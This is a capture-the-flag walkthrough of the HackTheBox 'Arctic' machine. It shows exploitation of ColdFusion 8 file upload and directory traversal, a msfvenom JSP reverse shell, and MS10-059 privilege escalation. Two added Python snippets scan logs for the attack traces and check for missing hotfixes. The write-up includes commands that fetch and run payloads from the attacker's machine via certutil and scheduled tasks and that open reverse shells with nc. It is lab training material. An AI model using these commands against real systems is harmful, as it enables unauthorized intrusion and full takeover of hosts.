The 30-second response time configured on this box is truly demoralizing. You can honestly pick up your phone and play for half a day after every single action.
Reconnaissance
nmap
nmap -sS -p 1-65535 10.10.10.11
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 15:31 CST
Nmap scan report for 10.10.10.11
Host is up (0.28s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
135/tcp open msrpc
8500/tcp open fmtp
49154/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 589.45 seconds
Port 8500 is open, so we can try connecting to it with nc:
nc 10.10.10.11 8500
After waiting thirty seconds, a response comes back:
HTTP/1.0 200 OK
Date: Thu, 14 May 2020 18:48:18 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Server: JRun Web Server
<html>
<head>
<title>Index of /</title></head><body bgcolor="#ffffff">
<h1>Index of /</h1><br><hr><pre><a href="CFIDE/">CFIDE/</a> <i>dir</i> 03/22/17 08:52 μμ
<a href="cfdocs/">cfdocs/</a> <i>dir</i> 03/22/17 08:55 μμ
</pre><hr></html>
Opening it in a browser shows that directory listing is enabled. The CFIDE and cfdocs folders confirm this is Adobe ColdFusion, and going into /CFIDE/administrator shows it is ColdFusion 8, so let's search for known vulnerabilities:
searchsploit coldfusion 8
---------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------- ---------------------------------
Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting | cfm/webapps/36067.txt
Adobe ColdFusion - Directory Traversal | multiple/remote/14641.py
Adobe ColdFusion - Directory Traversal (Metasploit) | multiple/remote/16985.rb
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution | windows/remote/43993.py
Adobe ColdFusion 2018 - Arbitrary File Upload | multiple/webapps/45979.txt
Adobe ColdFusion 9 - Administrative Authentication Bypass | windows/webapps/27755.txt
Adobe ColdFusion < 11 Update 10 - XML External Entity Injection | multiple/webapps/40346.py
Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site Scripting | cfm/webapps/33170.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Query String Cross-Site Scripting | cfm/webapps/33167.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String Cross-Site Scripting | cfm/webapps/33169.txt
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' Cross-Site Scripting | cfm/webapps/33168.txt
Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution | multiple/remote/19093.txt
Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Decrypt Pages | windows/local/19220.c
ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit) | cfm/webapps/16788.rb
ColdFusion 9-10 - Credential Disclosure | multiple/webapps/25305.py
ColdFusion MX - Missing Template Cross-Site Scripting | cfm/remote/21548.txt
ColdFusion Scripts Red_Reservations - Database Disclosure | asp/webapps/7440.txt
Macromedia ColdFusion MX 6.0 - Remote Development Service File Disclosure | multiple/remote/22867.pl
---------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
In this list there is an AFE (arbitrary file upload / execution) vulnerability and the directory traversal that is all over Baidu.
So we now have two vectors for getting a shell.
Getting tolis privileges
RCE
First, the AFE vulnerability:
ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit) | cfm/webapps/16788.rb
Open this entry and take a look:
'CVE', '2009-2265' ],
[ 'OSVDB', '55684'],
Only this part matters: because this is a Metasploit module, we cannot use it directly, so we have to find our own PoC for CVE-2009-2265. Our PoC comes from exploit-db.
Note: after copying and pasting, edit the host settings inside the file:
import uuid

if __name__ == '__main__':
    # Define some information
    lhost = '10.10.16.4'          # our address, which the reverse shell connects back to
    lport = 4444                  # our listening port
    rhost = "10.10.10.11"         # target address
    rport = 8500                  # ColdFusion / JRun port found by nmap
    filename = uuid.uuid4().hex   # random name for the uploaded file
Change lhost and lport.
Interestingly, rhost does not need changing, which suggests the author of this PoC wrote it while working on this HTB box as well.
With this script no nc listener is needed; it opens the shell directly.
File read vulnerability
Adobe ColdFusion - Directory Traversal - Multiple remote Exploit (exploit-db.com)
This is the exploit script. If I had looked at the official documentation earlier, I would not have spent half a day poking at it without result. So: read fewer unreliable exploit walkthroughs and just read the official documentation.
Later, while exploiting it, I also forgot the box is Windows and searched following the Linux filesystem layout, wasting a lot more time. At one point I thought the vulnerability had been patched, until I got a shell with the first method, looked at the directory listing, and only then realized the Windows filesystem is laid out differently.
Exploitation method:
Simply visit the URL in the address bar following the pattern in the exploit.
This gives access to the password file and with it the SHA1 hash of the password; crack it yourself with a hash-cracking tool and you can log in to the admin backend.
The admin backend has a file upload function, which we can combine with the file access to get a shell.
First create a JSP payload with msfvenom:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.7 LPORT=4444 -f raw > exp.jsp
Then start a Python HTTP server:
python -m SimpleHTTPServer 80
Then create a scheduled task that downloads the payload from our machine:
Debugging & Logging -> Scheduled Tasks -> Schedule New Task
In the URL field enter the address of the payload file:
http://10.10.16.7/1.jsp
Then submit. After a moment a request arrives at the Python server, and the upload is done.
We then find the uploaded file in the /CFIDE folder on port 8500 from earlier. Click the file to execute it, with nc listening on our side:
nc -lvnp 4444
Done.
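As an added detection-side example (my code, not part of the original writeup), a small Python log scanner that flags two traces this chain leaves in the web server's access log: dot-dot traversal sequences in a request and a .jsp being requested under /CFIDE. The log lines, the `?file=` parameter and the `secret.txt` name are constructed, not captured from the box.

```python
import re
from urllib.parse import unquote

# Constructed Common Log Format lines standing in for a JRun access log
# (IPs echo the writeup; the requests and the ?file= parameter are invented).
SAMPLE_LOG = """\
10.10.16.7 - - [03/Jan/2022:15:40:01 +0200] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 5120
10.10.16.7 - - [03/Jan/2022:15:40:31 +0200] "GET /CFIDE/administrator/enter.cfm?file=..%2F..%2F..%2Fsecret.txt HTTP/1.1" 200 312
10.10.14.2 - - [03/Jan/2022:15:41:05 +0200] "GET /cfdocs/ HTTP/1.1" 200 890
10.10.16.7 - - [03/Jan/2022:15:45:12 +0200] "GET /CFIDE/exp.jsp HTTP/1.1" 200 0
10.10.14.2 - - [03/Jan/2022:15:46:00 +0200] "GET /CFIDE/scripts/ajax/package/cfajax.js HTTP/1.1" 200 2100
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def fully_decode(s: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so a double-encoded '..%252F' is still seen as '../'."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify(target: str) -> list:
    """Return the rule names a request target trips (empty list if it looks benign)."""
    decoded = fully_decode(target).replace("\\", "/")
    path = decoded.split("?", 1)[0].lower()
    rules = []
    if "../" in decoded or decoded.endswith(".."):
        rules.append("traversal")          # dot-dot segments anywhere in path or query
    if path.startswith("/cfide/") and path.endswith(".jsp"):
        rules.append("jsp_under_cfide")    # CFIDE ships .cfm/.js/.css, not .jsp
    return rules


def scan_log(text: str) -> list:
    """Parse CLF lines and return one alert dict per (request, rule) hit."""
    alerts = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        for rule in classify(m["target"]):
            alerts.append({"rule": rule, "ip": m["ip"], "target": m["target"], "status": m["status"]})
    return alerts
```

Run it over the real JRun access log instead of `SAMPLE_LOG` to get the same alerts for live traffic; a traversal hit followed by a .jsp request under /CFIDE from the same source is the sequence described above.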
Privilege escalation to root
Standard procedure
First, systeminfo to look at the configuration:
C:\>systeminfo
Host Name: ARCTIC
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-507-9857321-84451
Original Install Date: 22/3/2017, 11:09:45
System Boot Time: 14/5/2020, 9:38:49
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 1.023 MB
Available Physical Memory: 261 MB
Virtual Memory: Max Size: 2.047 MB
Virtual Memory: Available: 1.199 MB
Virtual Memory: In Use: 848 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.11
Then use WES to see which patches are missing (usage is covered in the tools post):
root@kali# /Windows-Exploit-Suggester/windows-exploit-suggester.py --database 2020-05-13-mssb.xls --systeminfo sysinfo
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
Discarding the IE vulnerabilities, which need a GUI session to exploit, there are still plenty of usable vulnerabilities:
- MS10-047
- MS10-059
- MS10-061
- MS10-073
- MS11-011
- MS13-005
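An added example (my code, not WES or the writeup's): a minimal Python version of the check WES performs, parsing the Hotfix(s) block of systeminfo output and comparing it against the bulletin-to-KB map for the candidates listed above. The systeminfo excerpts are constructed, and superseding updates are not handled, so a host patched via a later cumulative update would still be reported as missing.

```python
import re

# Constructed systeminfo excerpts: the first mirrors the unpatched ARCTIC host, the second is invented.
UNPATCHED = """\
Host Name:                 ARCTIC
OS Version:                6.1.7600 N/A Build 7600
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
"""
PATCHED = """\
OS Version:                6.1.7600 N/A Build 7600
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB982799
                           [02]: KB2393802
                           [03]: KB2778930
Network Card(s):           1 NIC(s) Installed.
"""

# Bulletin -> KB for the privilege-escalation candidates WES listed above (KBs from its output).
BULLETIN_KB = {
    "MS10-047": "KB981852",
    "MS10-059": "KB982799",
    "MS10-061": "KB2347290",
    "MS10-073": "KB981957",
    "MS11-011": "KB2393802",
    "MS13-005": "KB2778930",
}
KEY_RE = re.compile(r"^(\S[^:]*):\s*(.*)$")   # "Field: value" lines start at column 0
KB_RE = re.compile(r"\[\d+\]:\s*(KB\d+)")      # indented "[nn]: KBxxxxxx" continuation lines


def parse_systeminfo(text: str) -> dict:
    """Turn systeminfo output into a dict; installed KBs end up in info['hotfixes']."""
    info = {"hotfixes": set()}
    in_hotfix = False
    for line in text.splitlines():
        if in_hotfix:
            kb = KB_RE.search(line)
            if kb:
                info["hotfixes"].add(kb.group(1))
                continue
        m = KEY_RE.match(line)
        if m:                                  # a new field ends the Hotfix(s) block
            in_hotfix = m.group(1) == "Hotfix(s)"
            if not in_hotfix:
                info[m.group(1)] = m.group(2).strip()
    return info


def missing_bulletins(info: dict, bulletin_kb: dict = BULLETIN_KB) -> list:
    """Bulletins whose KB is absent; unlike WES this ignores superseding updates."""
    return sorted(b for b, kb in bulletin_kb.items() if kb not in info["hotfixes"])
```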
Following 0xdf, we use the MS10-059 vulnerability with this GitHub from egre55.
This one is very simple.
After downloading it, serve it with a Python HTTP server and fetch it on the target with certutil:
python -m SimpleHTTPServer 80
Download:
certutil.exe -urlcache -split -f "http://10.10.16.7/2.exe" 1.exe
Run:
./1.exe 10.10.16.7 4444
Remember to have nc listening to receive the forwarded shell.